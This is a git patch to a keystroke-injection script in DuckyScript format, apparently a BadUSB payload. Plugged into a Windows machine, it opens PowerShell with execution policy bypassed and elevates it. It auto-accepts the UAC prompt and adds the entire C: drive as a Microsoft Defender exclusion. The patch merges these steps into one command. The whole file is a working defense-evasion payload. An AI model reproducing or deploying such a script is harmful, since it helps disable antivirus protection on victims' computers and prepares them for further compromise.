From d225ffa8db7157e4a8d5ddd38f11cb5af33cb3d3 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Tue, 25 Jun 2024 11:38:41 +0000 Subject: [PATCH] Update Add Exclusion C-drive.txt --- Tools/Add Exclusion C-drive.txt | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/Tools/Add Exclusion C-drive.txt b/Tools/Add Exclusion C-drive.txt index a701968..4222151 100644 --- a/Tools/Add Exclusion C-drive.txt +++ b/Tools/Add Exclusion C-drive.txt @@ -9,15 +9,7 @@ DEFAULT_DELAY 100 REM open powershell (remove -W Hidden to show the window). GUI r DELAY 750 -STRING powershell -NoP -NonI -W Hidden -Exec Bypass +STRING powershell -Exec Bypass -C Add-MpPreference -ExclusionPath C:\ CTRL-SHIFT ENTER -DELAY 1500 +DELAY 2500 ALT y -DELAY 5000 - -REM add the exclusion path. -STRING Add-MpPreference -ExclusionPath C:\ -ENTER -DELAY 250 -STRING exit -ENTER